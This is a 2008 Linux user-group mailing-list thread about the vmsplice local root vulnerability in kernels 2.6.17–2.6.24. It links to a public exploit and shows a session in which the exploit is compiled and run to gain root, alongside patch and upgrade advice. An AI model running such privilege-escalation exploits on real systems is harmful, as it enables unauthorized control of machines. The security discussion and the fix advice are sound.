well, there is a hotfix, but it's so buggy http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c, either recompile with disabling vmsplice, or grab your self the brand new kernel 2.6.24.2, it's supposed to be fixed in it.
On Feb 12, 2008 5:49 AM, Ahmad Abu Gharbieh <[EMAIL PROTECTED]> wrote: > > sup guys, > i thought i should share this > 2 days ago a vulnerability was reported in kernel 2.6.17 - 2.6.24, a > local root exploit can be found on > https://bugs.gentoo.org/attachment.cgi?id=143059 > for more information on > https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587 > > to fix this u can recompile the kernel without vmsplice, other patches > r available > > i tested it on gutsy x86_64 and it worked.. > > [EMAIL PROTECTED]:/tmp$ gcc linux_vmsplice.c -o exploit > [EMAIL PROTECTED]:/tmp$ whoami > ag > [EMAIL PROTECTED]:/tmp$ ./exploit > ----------------------------------- > Linux vmsplice Local Root Exploit > By qaaz > ----------------------------------- > [+] mmap: 0x100000000000 .. 0x100000001000 > [+] page: 0x100000000000 > [+] page: 0x100000000038 > [+] mmap: 0x4000 .. 0x5000 > [+] page: 0x4000 > [+] page: 0x4038 > [+] mmap: 0x1000 .. 0x2000 > [+] page: 0x1000 > [+] mmap: 0x2b66fdb34000 .. 0x2b66fdb66000 > [+] root > [EMAIL PROTECTED]:/tmp# whoami > root > [EMAIL PROTECTED]:/tmp# > > > cheers.. > > -- > \x41\x61\x67 > > > > -- Ala'a A. Ibrahim http://guru.alaa-ibrahim.com/ --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "Jolug" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/Jolug?hl=en-GB -~----------~----~----~----~------~----~------~--~---
